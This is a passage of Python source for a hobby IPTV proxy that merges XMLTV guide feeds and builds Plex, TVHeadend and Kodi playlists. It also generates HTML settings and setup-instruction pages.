        if os.stat(combined).st_mtime > target_utc_datetime.timestamp():
            logger.debug("Skipping download of epg")
            return
    # reset the combined file to an empty <tv> document before merging
    with open('./cache/combined.xml', 'w') as f:
        f.write('<?xml version="1.0" encoding="UTF-8"?>'.rstrip('\r\n'))
        f.write('''<tv></tv>''')
    for source_url in [EXTXMLURL]:
        # skip unset entries and the placeholder from the example settings
        if source_url != '' and source_url != 'www.testurl.com/epg.xml':
            xmltv_merger(source_url)
def xmltv_merger(xml_url):
    """Download one external XMLTV feed and append its channels and
    programmes into cache/combined.xml (seeded from cache/epg.xml).
    """
    # todo download each xmltv
    # follow redirects so the final url's extension decides gz handling
    response = req.get(xml_url)
    if response.history:
        logger.debug("Request was redirected")
        for resp in response.history:
            logger.debug("%s %s" % (resp.status_code, resp.url))
        logger.debug("Final destination: %s %s" % (response.status_code, response.url))
        xml_url = response.url
    else:
        logger.debug("Request was not redirected")
    if xml_url.endswith('.gz'):
        requests.urlretrieve(xml_url, './cache/raw.xml.gz')
        opened = gzip.open('./cache/raw.xml.gz')
    else:
        requests.urlretrieve(xml_url, './cache/raw.xml')
        opened = open('./cache/raw.xml', encoding="UTF-8")
    # base document that the external feed gets merged into
    tree = ET.parse('./cache/epg.xml')
    treeroot = tree.getroot()
    try:
        source = ET.parse(opened)
    except:
        # Try file as gzip instead (some servers serve gz without the extension)
        requests.urlretrieve(xml_url, './cache/raw.xml.gz')
        opened = gzip.open('./cache/raw.xml.gz')
        source = ET.parse(opened)
    # append the external feed's channels and programmes wholesale
    for channel in source.iter('channel'):
        treeroot.append(channel)
    for programme in source.iter('programme'):
        treeroot.append(programme)
    tree.write('./cache/combined.xml')
    # prepend the xml declaration (ET.write omitted it here)
    with open('./cache/combined.xml', 'r+') as f:
        content = f.read()
        f.seek(0, 0)
        f.write('<?xml version="1.0" encoding="UTF-8"?>'.rstrip('\r\n') + content)
    return
############################################################
# TVHeadend
############################################################
def build_tvh_playlist():
    """Build an m3u8 playlist for TVHeadend with proxied /auto/v urls."""
    global chan_map
    playlist_text = "#EXTM3U\n"
    for pos in range(1, len(chan_map) + 1):
        try:
            channel_url = "{0}/{1}/auto/v{2}".format(SERVER_HOST, SERVER_PATH, chan_map[pos].channum)
            # TVH display name carries the position prefix
            name = str(pos) + " " + chan_map[pos].channame
            playlist_text += '#EXTINF:-1 tvg-id="%s" tvh-chnum="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s",%s\n' % (
                chan_map[pos].channum, chan_map[pos].channum, name, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
                chan_map[pos].channum,
                name)
            playlist_text += '%s\n' % channel_url
        except:
            logger.exception("Exception while updating playlist: ")
    logger.info("Built TVH playlist")
    return playlist_text
def get_tvh_channels():
    """Fetch the full channel grid from the TVHeadend HTTP API.

    Returns:
        list: the 'entries' list from TVHeadend's channel/grid endpoint,
        or None if the request or JSON decode fails.
    """
    url = 'HTTP://%s:9981/api/channel/grid?start=0&limit=999999' % TVHURL
    try:
        r = req.get(url, auth=req.auth.HTTPBasicAuth(TVHUSER, TVHPASS)).text
        data = json.loads(r)
        return data['entries']
    except Exception:
        # BUGFIX: was a bare 'except:' with a silent print ("An error
        # occured" [sic]); log the real cause like the rest of this file.
        logger.exception("An error occurred fetching TVHeadend channels")
############################################################
# PLEX Live
############################################################
def discover():
    """Return the HDHomeRun discovery document that Plex Live TV expects."""
    base_url = SERVER_HOST + "/" + SERVER_PATH
    payload = {
        'FriendlyName': 'SSTVProxy',
        'Manufacturer': 'Silicondust',
        'ModelNumber': 'HDTC-2US',
        'FirmwareName': 'hdhomeruntc_atsc',
        'TunerCount': 6,
        'FirmwareVersion': '20150826',
        'DeviceID': '12345678',
        'DeviceAuth': 'test1234',
        'BaseURL': base_url,
        'LineupURL': '%s/lineup.json' % urljoin(SERVER_HOST, SERVER_PATH),
    }
    return jsonify(payload)
def tvh_discover():
    """Return the HDHomeRun discovery document for the /tvh passthrough."""
    tvh_base = SERVER_HOST + "/tvh"
    payload = {
        'FriendlyName': 'SSTVProxy',
        'Manufacturer': 'Silicondust',
        'ModelNumber': 'HDTC-2US',
        'FirmwareName': 'hdhomeruntc_atsc',
        'TunerCount': 6,
        'FirmwareVersion': '20150826',
        'DeviceID': '12345678',
        'DeviceAuth': 'test1234',
        'BaseURL': tvh_base,
        'LineupURL': '%s/lineup.json' % tvh_base,
    }
    return jsonify(payload)
def status():
    """Report tuner scan status to HDHomeRun clients (never scanning)."""
    payload = {
        'ScanInProgress': 0,
        'ScanPossible': 1,
        'Source': "Cable",
        'SourceList': ['Cable'],
    }
    return jsonify(payload)
def m3u8_plex(lineup, inputm3u8):
    """Append channels from an external m3u8 into a Plex lineup list.

    Args:
        lineup: list of lineup dicts, extended in place.
        inputm3u8: the external playlist split into lines; each '#...' line
            creates a placeholder entry and the following rtmp/http line
            fills in its URL via this proxy's auto endpoint.

    Returns:
        list: the same lineup list, extended.
    """
    for i in range(len(inputm3u8)):
        # BUGFIX: condition was 'x != "" or x != "\n"', which is always true,
        # so blank lines were never actually skipped.
        if inputm3u8[i] not in ("", "\n"):
            try:
                if inputm3u8[i].startswith("#"):
                    # '#EXTINF:...,<name>' -> new placeholder entry
                    grouper = inputm3u8[i]
                    grouper = grouper.split(',')
                    name = grouper[1]
                    lineup.append({'GuideNumber': str(len(lineup) + 1),
                                   'GuideName': name,
                                   'URL': 'empty'
                                   })
                elif inputm3u8[i].startswith("rtmp") or inputm3u8[i].startswith("http"):
                    # Stream URL for the entry created by the preceding '#' line.
                    template = "{0}/{1}/auto/v{2}?url={3}"
                    url = template.format(SERVER_HOST, SERVER_PATH, str(len(lineup)), inputm3u8[i])
                    lineup[-1]['URL'] = url
            except Exception:
                # BUGFIX: logger.debug was called print-style with a bare
                # positional argument, which breaks logging's %-formatting.
                logger.debug("skipped: %s", inputm3u8[i])
    return lineup
def lineup(chan_map):
    """Build the HDHomeRun lineup.json payload for Plex.

    Lists every mapped channel via this proxy's auto endpoint, then
    optionally appends channels from an extra m3u8 source (URL takes
    priority over file).

    Args:
        chan_map: dict of playlist position -> channel object
            (exposes .channum and .channame).

    Returns:
        flask.Response: JSON array of lineup entries.
    """
    lineup = []
    for c in range(1, len(chan_map) + 1):
        template = "{0}/{1}/auto/v{2}"
        url = template.format(SERVER_HOST, SERVER_PATH, chan_map[c].channum)
        lineup.append({'GuideNumber': str(chan_map[c].channum),
                       'GuideName': chan_map[c].channame,
                       'URL': url
                       })
    if EXTM3URL != '':
        logger.debug("extra m3u8 url")
        # NOTE(review): 'requests' appears to be urllib.request aliased at the
        # top of the file (urlopen/urlretrieve are urllib APIs) - confirm.
        inputm3u8 = requests.urlopen(EXTM3URL).read().decode('utf-8')
        inputm3u8 = inputm3u8.split("\n")[1:]  # drop the '#EXTM3U' header line
        return jsonify(m3u8_plex(lineup, inputm3u8))
    elif EXTM3UFILE != '':
        logger.debug("extra m3u8 file")
        # BUGFIX: file handle was opened and never closed (resource leak);
        # use a context manager so it is released deterministically.
        with open(EXTM3UFILE, 'r') as f:
            inputm3u8 = f.readlines()
        inputm3u8 = inputm3u8[1:]
        inputm3u8 = [x.strip("\n") for x in inputm3u8]
        return jsonify(m3u8_plex(lineup, inputm3u8))
    return jsonify(lineup)
def tvh_lineup():
    """Build a lineup.json payload from TVHeadend's own channel list."""
    entries = []
    stream_tmpl = 'http://%s:%s@%s:9981/stream/channel/%s?profile=%s&weight=%s'
    for chan in get_tvh_channels():
        if not chan['enabled']:
            continue
        stream_url = stream_tmpl % (
            TVHUSER, TVHPASS, TVHURL, chan['uuid'], tvhstreamProfile, int(tvhWeight))
        entries.append({'GuideNumber': str(chan['number']),
                        'GuideName': chan['name'],
                        'URL': stream_url
                        })
    return jsonify(entries)
def lineup_post():
    """No-op handler for lineup.post; responds with an empty body."""
    response_body = ''
    return response_body
def device():
    """Render device.xml (HDHomeRun device description) for discovery."""
    base_url = SERVER_HOST + "/" + SERVER_PATH
    data = {
        'FriendlyName': 'SSTVProxy',
        'Manufacturer': 'Silicondust',
        'ModelNumber': 'HDTC-2US',
        'FirmwareName': 'hdhomeruntc_atsc',
        'TunerCount': 6,
        'FirmwareVersion': '20150826',
        'DeviceID': '12345678',
        'DeviceAuth': 'test1234',
        'BaseURL': base_url,
        'LineupURL': '%s/lineup.json' % urljoin(SERVER_HOST, SERVER_PATH),
    }
    return render_template('device.xml', data=data), {'Content-Type': 'application/xml'}
def tvh_device():
    """Render device.xml for the TVHeadend passthrough endpoint."""
    tvh_base = SERVER_HOST + "/tvh"
    data = {
        'FriendlyName': 'SSTVProxy',
        'Manufacturer': 'Silicondust',
        'ModelNumber': 'HDTC-2US',
        'FirmwareName': 'hdhomeruntc_atsc',
        'TunerCount': 6,
        'FirmwareVersion': '20150826',
        'DeviceID': '12345678',
        'DeviceAuth': 'test1234',
        'BaseURL': tvh_base,
        'LineupURL': '%s/lineup.json' % tvh_base,
    }
    return render_template('device.xml', data=data), {'Content-Type': 'application/xml'}
############################################################
# Kodi
############################################################
def build_kodi_playlist():
    """Build the Kodi m3u8 playlist from the current channel map.

    The playlist lists each channel twice: once as a dynamic HLS entry
    routed through this proxy, and once as a static rtmp URL direct to the
    provider. When getProgram() reports a title other than 'none' the
    channel is listed a third time under the "LIVE" group, titled with
    that programme name. A final pseudo-channel points at refresh.m3u8.

    Returns:
        str: the complete playlist text.
    """
    global chan_map
    # build playlist using the data we have
    new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(SERVER_HOST, SERVER_PATH)
    for pos in range(1, len(chan_map) + 1):
        try:
            # build channel url
            url = "{0}/playlist.m3u8?ch={1}&strm={2}&qual={3}"
            rtmpTemplate = 'rtmp://{0}.smoothstreams.tv:3625/{1}/ch{2}q{3}.stream?wmsAuthSign={4}'
            urlformatted = url.format(SERVER_PATH, chan_map[pos].channum, 'hls', QUAL)
            channel_url = urljoin(SERVER_HOST, urlformatted)
            # build playlist entry
            new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s" group-title="Dynamic",%s\n' % (
                chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
                chan_map[pos].channum,
                chan_map[pos].channame)
            new_playlist += '%s\n' % channel_url
            new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s" group-title="Static RTMP",%s\n' % (
                chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
                chan_map[pos].channum,
                chan_map[pos].channame)
            # Quality falls back to '1' past QUALLIMIT - presumably higher
            # channel numbers only exist in one quality; confirm.
            new_playlist += '%s\n' % rtmpTemplate.format(SRVR, SITE, "{:02}".format(pos), QUAL if pos <= QUALLIMIT else '1',
                                                         token['hash'])
            prog = getProgram(pos)
            if prog.title != 'none':
                new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s" group-title="LIVE",%s\n' % (
                    chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
                    chan_map[pos].channum,
                    prog.title)
                new_playlist += '%s\n' % channel_url
        except:
            logger.exception("Exception while updating kodi playlist on channel #%s." % pos)
    # Extra pseudo-channel whose URL triggers a playlist refresh in Kodi.
    new_playlist += '#EXTINF:-1 tvg-id="static_refresh" tvg-name="Static Refresh" tvg-logo="%s/%s/empty.png" channel-id="0" group-title="Static RTMP",Static Refresh\n' % (
        SERVER_HOST, SERVER_PATH)
    new_playlist += '%s/%s/refresh.m3u8\n' % (SERVER_HOST, SERVER_PATH)
    logger.info("Built Kodi playlist")
    # if ADDONPATH and os.path.isdir(ADDONPATH):
    #     #lazy install, low priority tbh
    #     tree = ET.parse(os.path.join(ADDONPATH, 'settings.xml'))
    #     root = tree.getroot()
    #     for child in root:
    #         if child.attrib['id'] == 'epgUrl':
    #             child.attrib['value'] = '%s/%s/epg.xml' % (SERVER_HOST, SERVER_PATH)
    #         elif child.attrib['id'] == 'm3uUrl':
    #             child.attrib['value'] = '%s/%s/kodi.m3u8' % (SERVER_HOST, SERVER_PATH)
    #         elif child.attrib['id'] == 'epgPathType':
    #             child.attrib['value'] = '1'
    #         elif child.attrib['id'] == 'm3uPathType':
    #             child.attrib['value'] = '1'
    #     tree.write(os.path.join(ADDONPATH, 'settings.xml'))
    return new_playlist
def rescan_channels():
    """Force Kodi to reload pvr.iptvsimple by toggling it over JSON-RPC.

    The toggle request is sent twice - once to disable the addon and once
    to re-enable it - which makes Kodi re-read its playlist and EPG.
    """
    raw_credentials = str.encode(KODIUSER + ':' + KODIPASS)
    auth_value = b'Basic ' + base64.b64encode(raw_credentials)
    rpc_headers = {'Content-Type': 'application/json', 'Authorization': auth_value}
    rpc_payload = {"jsonrpc": "2.0", "method": "Addons.SetAddonEnabled",
                   "params": {"addonid": "pvr.iptvsimple", "enabled": "toggle"}, "id": 1}
    endpoint = 'http://%s:%s/jsonrpc' % (request.environ.get('REMOTE_ADDR'), KODIPORT)
    body = json.dumps(rpc_payload).encode('utf-8')
    rpc_call = requests.Request(endpoint, body, rpc_headers)
    # has to happen twice to toggle off then back on
    result = requests.urlopen(rpc_call)
    result = requests.urlopen(rpc_call)
    logger.info("Forcing Kodi to rescan, result:%s " % result.read())
############################################################
# Html
############################################################
# CSS injected into every HTML page generated below; edit this to restyle
# all of the generated pages at once.
style = """
<style type="text/css">
body { background: white url("https://guide.smoothstreams.tv/assets/images/channels/150.png") no-repeat fixed center center; background-size: 500px 500px; color: black; }
h1 { color: white; background-color: black; padding: 0.5ex }
h2 { color: white; background-color: black; padding: 0.3ex }
.container {display: table; width: 100%;}
.left-half {position: absolute; left: 0px; width: 50%;}
.right-half {position: absolute; right: 0px; width: 50%;}
</style>
"""
def create_menu():
    """Generate the static HTML pages served from ./cache.

    Writes five pages: settings.html (basic options form),
    adv_settings.html (advanced options form), channels.html (channel grid
    plus upcoming shows), index.html (landing page) and howto.html (setup
    instructions). Forms POST back to the /handle_data route.
    """
    footer = '<p>Donations: PayPal to vorghahn.sstv@gmail.com or BTC - 19qvdk7JYgFruie73jE4VvW7ZJBv8uGtFb</p>'
    # --- settings.html: basic settings form plus the outputs reference table ---
    with open("./cache/settings.html", "w") as html:
        html.write("""<html>
<head>
<meta charset="UTF-8">
%s
<title>YAP</title>
</head>
<body>\n""" % (style,))
        html.write('<section class="container"><div class="left-half">')
        html.write("<h1>YAP Settings</h1>")
        template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
        html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        # NOTE(review): channelmap/chanindex appear unused in this function.
        channelmap = {}
        chanindex = 0
        # NOTE(review): 'list' shadows the builtin here; left unchanged.
        list = ["Username", "Password", "Quality", "Stream", "Server", "Service", "IP", "Port",
                "ExternalIP", "ExternalPort"]
        html.write('<table width="300" border="2">')
        # One table row per setting; dropdown-backed settings get a <select>
        # with the currently active value pre-selected.
        for setting in list:
            if setting.lower() == 'service':
                html.write('<tr><td>Service:</td><td><select name="Service" size="1">')
                for option in providerList:
                    html.write('<option value="%s"%s>%s</option>' % (
                        option[0], ' selected' if SITE == option[1] else "", option[0]))
                html.write('</select></td></tr>')
            elif setting.lower() == 'server':
                html.write('<tr><td>Server:</td><td><select name="Server" size="1">')
                for option in serverList:
                    html.write('<option value="%s"%s>%s</option>' % (
                        option[0], ' selected' if SRVR == option[1] else "", option[0]))
                html.write('</select></td></tr>')
            elif setting.lower() == 'stream':
                html.write('<tr><td>Stream:</td><td><select name="Stream" size="1">')
                for option in streamtype:
                    html.write(
                        '<option value="%s"%s>%s</option>' % (option, ' selected' if STRM == option else "", option))
                html.write('</select></td></tr>')
            elif setting.lower() == 'quality':
                html.write('<tr><td>Quality:</td><td><select name="Quality" size="1">')
                for option in qualityList:
                    html.write('<option value="%s"%s>%s</option>' % (
                        option[0], ' selected' if QUAL == option[1] else "", option[0]))
                html.write('</select></td></tr>')
            elif setting.lower() == 'password':
                # Password input so the value is masked in the browser.
                html.write('<tr><td>%s:</td><td><input name="%s" type="Password" value="%s"></td></tr>' % (
                    setting, setting, PASS))
            else:
                val = "Unknown"
                if setting == "Username":
                    val = USER
                elif setting == "IP":
                    val = LISTEN_IP
                elif setting == "Port":
                    val = LISTEN_PORT
                elif setting == "ExternalIP":
                    val = EXTIP
                elif setting == "ExternalPort":
                    val = EXTPORT
                html.write(
                    '<tr><td>%s:</td><td><input name="%s" type="text" value="%s"></td></tr>' % (setting, setting, val))
        html.write('</table>')
        html.write('<input type="submit" value="Submit">')
        html.write('</form>')
        # NOTE(review): 'type' relies on a module-level variable shadowing the
        # builtin; confirm it is assigned elsewhere in the file.
        html.write("<p>You are running version (%s %s), the latest is %s</p>" % (type, __version__, latest_ver))
        html.write("</br><p>Restarts can take a while, it is not immediate.</p>")
        # Three one-button forms: restart, update+restart, dev-update+restart.
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        html.write('<input type="hidden" name="restart" value="1">')
        html.write('<input type="submit" value="Restart">')
        html.write('</form>')
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        html.write('<input type="hidden" name="restart" value="2">')
        html.write('<input type="submit" value="Update + Restart">')
        html.write('</form>')
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        html.write('<input type="hidden" name="restart" value="3">')
        html.write('<input type="submit" value="Update(Dev Branch) + Restart">')
        html.write('</form>')
        html.write('<p>&nbsp;</p>')
        html.write('<p>&nbsp;</p>')
        html.write('<p>&nbsp;</p>')
        html.write('<p>&nbsp;</p>')
        html.write(footer)
        # Right-hand column: reference table of every URL this proxy serves.
        html.write('</div><div class="right-half"><h1>YAP Outputs</h1>')
        html.write("<table><tr><td rowspan='2'>Standard Outputs</td><td>m3u8 - %s/playlist.m3u8</td></tr>" % urljoin(
            SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>EPG - %s/epg.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write(
            "<tr><td>Sports EPG (Alternative)</td><td>%s/sports.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write(
            "<tr><td>Kodi RTMP supported</td><td>m3u8 - %s/kodi.m3u8</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write("<tr><td rowspan='2'>Plex Live<sup>1</sup></td><td>Tuner - %s</td></tr>" % urljoin(SERVER_HOST,
                                                                                                      SERVER_PATH))
        html.write("<tr><td>EPG - %s/epg.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write("<tr><td>TVHeadend<sup>1</sup></td><td>%s/tvh.m3u8</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write(
            "<tr><td rowspan='2'>Remote Internet access<sup>2</sup></td><td>m3u8 - %s/external.m3u8</td></tr>" % urljoin(
                EXT_HOST, SERVER_PATH))
        html.write("<tr><td>EPG - %s/epg.xml</td></tr>" % urljoin(EXT_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write(
            "<tr><td rowspan='2'>Combined Outputs<sup>2</sup></td><td>m3u8 - %s/combined.m3u8</td></tr>" % urljoin(
                SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>epg - %s/combined.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write(
            "<tr><td>Static Playlist</td><td>m3u8 - %s/static.m3u8</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write(
            "<tr><td rowspan='2'>TVHProxy<sup>3</sup></td><td>Tuner - %s</td></tr>" % urljoin(SERVER_HOST, 'tvh'))
        html.write("<tr><td>EPG - http://%s:9981/xmltv/channels</td></tr>" % TVHURL)
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write("<tr><td>Test Playlist for troubleshooting</td><td>%s/test.m3u8</td></tr>" % urljoin(SERVER_HOST,
                                                                                                        SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write("<tr><td>Dynamic xspf, includes currently showing programs</td><td>%s/playlist.xspf</td></tr>" % urljoin(SERVER_HOST,
                                                                                                                            SERVER_PATH))
        html.write("<tr><td>Static xspf</td><td>%s/static.xspf</td></tr>" % urljoin(SERVER_HOST,
                                                                                    SERVER_PATH))
        html.write("<tr><td>&nbsp;</td><td>&nbsp;</td></tr>")
        html.write("<tr><td>Note 1:</td><td>Requires FFMPEG installation and setup</td></tr>")
        html.write("<tr><td>Note 2:</td><td>Requires External IP and port in advancedsettings</td></tr>")
        html.write("<tr><td>Note 3:</td><td>Requires TVH proxy setup in advancedsettings</td></tr></table>")
        html.write("</div></section></body></html>\n")
    # --- adv_settings.html: advanced settings form ---
    with open("./cache/adv_settings.html", "w") as html:
        html.write("""<html>
<head>
<meta charset="UTF-8">
%s
<title>YAP</title>
</head>
<body>\n""" % (style,))
        html.write('<section class="container"><div class="left-half">')
        html.write("<h1>YAP Settings</h1>")
        template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
        html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        # NOTE(review): channelmap/chanindex appear unused in this function.
        channelmap = {}
        chanindex = 0
        adv_set = ["kodiuser", "kodipass", "ffmpegloc", "kodiport", "extram3u8url", "extram3u8name", "extram3u8file",
                   "extraxmlurl", "tvhredirect", "tvhaddress", "tvhuser", "tvhpass", "overridexml", "checkchannel"]
        html.write('<table width="300" border="2">')
        for setting in adv_set:
            if setting.lower() == 'kodipass':
                # Password input so the value is masked in the browser.
                html.write('<tr><td>%s:</td><td><input name="%s" type="Password" value="%s"></td></tr>' % (
                    setting, setting, KODIPASS))
            elif setting == "checkchannel":
                html.write('<tr><td>%s:</td><td><select name="%s" size="1"><option value="True" %s>Enabled</option><option value="False" %s>Disabled</option></select></td></tr>' % (setting, setting, ' selected' if CHECK_CHANNEL == True else "", ' selected' if CHECK_CHANNEL == False else ""))
            else:
                val = "Unknown"
                if setting == "kodiuser":
                    val = KODIUSER
                elif setting == "kodiport":
                    val = KODIPORT
                elif setting == "ffmpegloc":
                    val = FFMPEGLOC
                elif setting == "extram3u8url":
                    val = EXTM3URL
                elif setting == "extram3u8file":
                    val = EXTM3UFILE
                elif setting == "extram3u8name":
                    val = EXTM3UNAME
                elif setting == "extraxmlurl":
                    val = EXTXMLURL
                elif setting == "tvhredirect":
                    val = TVHREDIRECT
                elif setting == "tvhaddress":
                    val = TVHURL
                elif setting == "tvhuser":
                    val = TVHUSER
                elif setting == "tvhpass":
                    val = TVHPASS
                elif setting == "overridexml":
                    val = OVRXML
                # The ffmpeg path field is only shown on Windows.
                if not (setting == "ffmpegloc" and not platform.system() == 'Windows'):
                    html.write('<tr><td>%s:</td><td><input name="%s" type="text" value="%s"></td></tr>' % (setting, setting, val))
        html.write('</table>')
        html.write('<input type="submit" value="Submit">')
        html.write('</form>')
        html.write("<p>You are running version (%s %s), the latest is %s</p>" % (type, __version__, latest_ver))
        html.write("</br><p>Restarts can take a while, it is not immediate.</p>")
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        html.write('<input type="hidden" name="restart" value="1">')
        html.write('<input type="submit" value="Restart">')
        html.write('</form>')
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        html.write('<input type="hidden" name="restart" value="2">')
        html.write('<input type="submit" value="Update + Restart">')
        html.write('</form>')
        html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
        html.write('<input type="hidden" name="restart" value="3">')
        html.write('<input type="submit" value="Update(Dev Branch) + Restart">')
        html.write('</form>')
        html.write('<p>&nbsp;</p>')
        html.write('<p>&nbsp;</p>')
        html.write('<p>&nbsp;</p>')
        html.write('<p>&nbsp;</p>')
        html.write(footer)
        html.write("</div></section></body></html>\n")
    # --- channels.html: logo grid (5 per row) plus currently-showing list ---
    with open("./cache/channels.html", "w") as html:
        global chan_map
        html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
        html.write("<h1>Channel List and Upcoming Shows</h1>")
        template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
        html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
        html.write('<section class="container"><div class="left-half"><table width="300" border="1">')
        template = "<td>{0}</td><td><a href='{2}/{3}/playlist.m3u8?ch={0}'><img src='{2}/{3}/{0}.png'></a></td></td>"
        # Rows of five: open <tr> on positions 1,6,... and close on multiples of 5.
        for i in chan_map:
            if i%5 == 1:
                html.write("<tr>")
            html.write(template.format(chan_map[i].channum, chan_map[i].channame, SERVER_HOST, SERVER_PATH))
            if i%5 == 0:
                html.write("</tr>")
        html.write("</table>")
        html.write("</br>%s</div>" % footer)
        html.write('<div class="right-half"><h3>Coming up</h3>')
        template = "{0} - <a href='{2}/{3}/playlist.m3u8?ch={0}'>{1}</a></br>"
        for i in chan_map:
            prog = getProgram(i)
            if prog.title != 'none':
                try:
                    html.write(template.format(chan_map[i].channum, prog.title.encode('utf-8'), SERVER_HOST, SERVER_PATH))
                except:
                    logger.exception(prog.title)
        html.write("</div></section>")
        html.write("</body></html>\n")
    # --- index.html: landing page linking to the other pages ---
    with open("./cache/index.html", "w") as html:
        html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
        template = "<h2><a href='{1}/{2}/{0}.html'>{3}</a></h2>"
        html.write("<h1>Welcome to YAP!</h1>")
        html.write(template.format("settings",SERVER_HOST, SERVER_PATH,"Options"))
        html.write(template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions"))
        html.write(template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List"))
        html.write(template.format("adv_channels", SERVER_HOST, SERVER_PATH, "Advanced Settings"))
        html.write(footer)
        html.write("</body></html>\n")
    # --- howto.html: static setup instructions ---
    with open("./cache/howto.html", "w") as html:
        html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
        template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
        html.write("<h1>Welcome to YAP!</h1>")
        html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
        html.write("<h2>Work in progress.</h2>")
        html.write("""<h2>Commandline Arguments</h2></br><p>'install' - forces recreation of the install function which creates certain files, such as the tvh internal grabber</br></br>
'headless' - uses command line for initial setup rather than gui</br></br>
'tvh' - each call to a piped channel will return channel 01 which is a 24/7 channel so will always generate a positive result, this allows TVH to create all services</p></br>""")
        html.write("<h2><a href='https://seo-michael.co.uk/how-to-setup-livetv-pvr-simple-xbmc-kodi/'>Kodi Setup</a></h2>")
        html.write("<p>Use this information to populate the settings:</p>")
        html.write("<p>m3u8 - %s/kodi.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write("<p>EPG - %s/epg.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
        html.write('''<p>RTMP is an issue so there's a special playlist for it (kodi.m3u8), it has two of every channel in both rtmp and hls, in kodi Tv use the Left hand menu and select group or filter. Then select dynamic (forced hls) or static rtmp.For static_refresh channel (151) don't use it on the guide page, use it on the channel list page. Otherwise kodi will crash. This will lock kodi for about 20secs but refresh the playlist.</p>''')
        html.write("<h2>Ensure you can get YAP working in Kodi or VLC first before attmepting Plex or TVHeadend!</h2>")
        html.write("<h2><a href='https://imgur.com/a/OZkN0'>Plex Setup</a></h2>")
        html.write("<p></p>")
        html.write("<h2>TVHeadend Setup</h2>")
        html.write("""<p>
In a nutshell here is how to do it on Ubuntu.</br>Replace USERNAME with your linux user:</br>
<b>1 Download the latest sstvProxy binary (exe) from:</b></br>
http://smoothstreams.tv/board/index.php?topic=1832.0</br>
Save it to:</br>
<blockquote><i>/home/USERNAME/Desktop/sstv</i></blockquote></br>
</br>
